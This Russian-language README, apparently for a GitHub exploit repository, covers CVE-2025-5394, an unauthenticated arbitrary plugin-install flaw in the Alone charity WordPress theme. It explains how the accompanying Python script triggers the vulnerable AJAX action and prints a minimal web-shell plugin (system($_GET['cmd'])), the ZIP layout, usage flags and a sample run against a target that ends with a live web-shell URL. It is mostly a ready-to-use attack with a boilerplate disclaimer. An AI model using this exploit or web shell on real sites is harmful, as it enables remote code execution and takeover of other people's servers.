
Alone – Благотворительная многоцелевая некоммерческая тема WordPress <= 7.8.3 - Отсутствие авторизации, позволяющее неаутентифицированную произвольную загрузку файлов через установку плагина
Alone – Charity Multipurpose Non-profit WordPress Theme Версии: <= 7.8.3 CVE: CVE-2025-5394 Оценка CVSS: 9.8 (Critical)
Тема Alone для WordPress уязвима к произвольной загрузке файлов из-за отсутствия проверки прав доступа в функции alone_import_pack_install_plugin().
Эта ошибка позволяет неавторизованным атакующим загружать ZIP-файлы (замаскированные под плагины) с удалённых серверов, что потенциально может привести к выполнению удалённого кода.
Этот репозиторий содержит Python-скрипт, который автоматизирует эксплуатацию CVE-2025-5394. Скрипт запускает уязвимое AJAX-действие и загружает поддельный плагин (содержащий веб-шелл) непосредственно на сервер WordPress.
Загружаемый ZIP-файл должен иметь следующую структуру:
shell_plugin.zip
└── shell_plugin
└── shell_plugin.php
Где:
shell_plugin — каталог плагина.shell_plugin.php — допустимый PHP-файл плагина с заголовком плагина.Пример минимального заголовка плагина внутри shell_plugin.php:
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>
python3 CVE-2025-5394.py -help
usage: CVE-2025-5394.py [-h] -u URL -s SHELL
CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress site URL
-s, --shell SHELL ZIP file URL containing webshell (.zip)
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target : http://target.com/wordpress
[>] Shell URL : http://target.com/shell.php
[>] Plugin Slug : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php
Этот скрипт предоставлен только в образовательных и исследовательских целях. Автор не несёт ответственности за любое неправомерное использование или незаконную деятельность, совершённую с помощью этого кода. Используйте его только на системах, которыми вы владеете или на тестирование которых у вас есть явное разрешение.
Nxploited ( Khaled Alenazi ) GitHub: https://github.com/Nxploited